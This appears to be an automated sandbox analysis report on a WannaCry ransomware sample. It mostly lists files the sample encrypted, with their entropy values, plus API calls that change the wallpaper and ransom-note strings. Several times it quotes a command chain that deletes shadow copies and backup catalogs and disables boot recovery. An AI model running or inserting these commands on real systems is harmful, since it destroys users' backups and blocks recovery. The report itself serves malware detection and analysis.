Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT entropy: 7.99544975418	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\6NdgdXhfsxD7_iwACPpZAmf8_AY.br[1].js.WNCRYT entropy: 7.99929847863	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT entropy: 7.99854396813	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.99839958714	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\CP3WQRJOZtCvRBRiz0lJ9gBoHsg.br[1].js.WNCRYT entropy: 7.99783700602	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\cw-4WTgZp0NrpKwS93-E-ENgJ1s.br[1].js.WNCRYT entropy: 7.99703401345	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT entropy: 7.99857344992	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\DKghZTJFTUtTng-U_kYAAUcNxRU.br[1].js.WNCRYT entropy: 7.99675852663	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\ircBWLoXEfmboO3a70zv4wR3qco.br[1].js.WNCRYT entropy: 7.99783476058	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT entropy: 7.99961808948	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT entropy: 7.99834713563	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673654956717.txt.WNCRYT entropy: 7.9983771286	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\NgBYMKYCFbLUht0w_dWiWEc8_84.br[1].js.WNCRYT entropy: 7.99988868543	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96ab5c09-25d6-4ec8-9dfa-01fef4843b90}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99631150457	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\Uqk2UlA-OBSXvX7_-n-Jo9zPFIk.br[1].js.WNCRYT entropy: 7.99944928124	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\VgwE8jbzHb04_mL1BsFSbJTzUTk.br[1].js.WNCRYT entropy: 7.99586625317	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\z_vjAju0aSvaiavYhvMyCAUkhHU.br[1].js.WNCRYT entropy: 7.9951210836	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673955008222.txt.WNCRYT entropy: 7.99825054219	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366674255160830.txt.WNCRYT entropy: 7.99821608786	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT entropy: 7.99159512125	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.99891622969	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99969504379	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT entropy: 7.99991817113	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99967799066	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT entropy: 7.99790181552	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT entropy: 7.99933439379	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99969630259	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT entropy: 7.99026205066	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.99495793311	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT entropy: 7.99626524819	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99250543901	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT entropy: 7.99438803924	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99969622686	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999328076	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99919888081	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT entropy: 7.99800813745	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.9961028361	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99427615163	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99850611263	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.99519680903	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99869758717	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99405312945	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99931754277	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT entropy: 7.99942559733	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.9996961199	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT entropy: 7.99970453145	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT entropy: 7.99993621762	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99213827077	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99982917942	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT entropy: 7.99563008509	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT entropy: 7.99923505214	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT entropy: 7.99769279741	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT entropy: 7.99929099783	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT entropy: 7.99372784488	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT entropy: 7.99887463399	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT entropy: 7.99230858465	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99974870856	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99969622686	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy) entropy: 7.99923505214	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy) entropy: 7.99769279741	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy) entropy: 7.99929099783	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy) entropy: 7.99372784488	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy) entropy: 7.99887463399	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy) entropy: 7.99230858465	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99974870856	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366672597747525.txt.WNCRY (copy) entropy: 7.99822487779	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673054843582.txt.WNCRY (copy) entropy: 7.99821289667	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673354927603.txt.WNCRY (copy) entropy: 7.99846079913	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsglobals.txt.WNCRY (copy) entropy: 7.99953826868	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appssynonyms.txt.WNCRY (copy) entropy: 7.99951423155	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{46669ec3-9227-40ac-89bc-b477e4677a0b}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99595578838	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5e0f71d6-4ae9-410b-87f6-29dff172110e}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99582996407	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6e3a287d-8222-4208-8758-9aa4793f0897}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99605758959	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a57f3ddc-63c5-42f9-b016-09afa52762e5}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99571234019	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsconversions.txt.WNCRY (copy) entropy: 7.99987118448	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsconversions.txt.WNCRY (copy) entropy: 7.99965161403	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsglobals.txt.WNCRY (copy) entropy: 7.99720126617	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99839375816	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99914902242	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99910287809	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy) entropy: 7.99610804017	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy) entropy: 7.99544975418	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99854396813	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673654956717.txt.WNCRY (copy) entropy: 7.9983771286	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96ab5c09-25d6-4ec8-9dfa-01fef4843b90}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99631150457	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673955008222.txt.WNCRY (copy) entropy: 7.99825054219	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99854396813	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366674255160830.txt.WNCRY (copy) entropy: 7.99821608786	Jump to dropped file

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,		27_2_00407E80
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,		30_2_00407E80

Deletes shadow drive data (may be related to ransomware)

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
Source: Wannacry.exe, 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: Wannacry.exe, 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: Wannacry.exe, 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: Wannacry.exe, 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: Wannacry.exe, 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: Wannacry.exe, 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: Wannacry.exe, 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: Wannacry.exe, 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
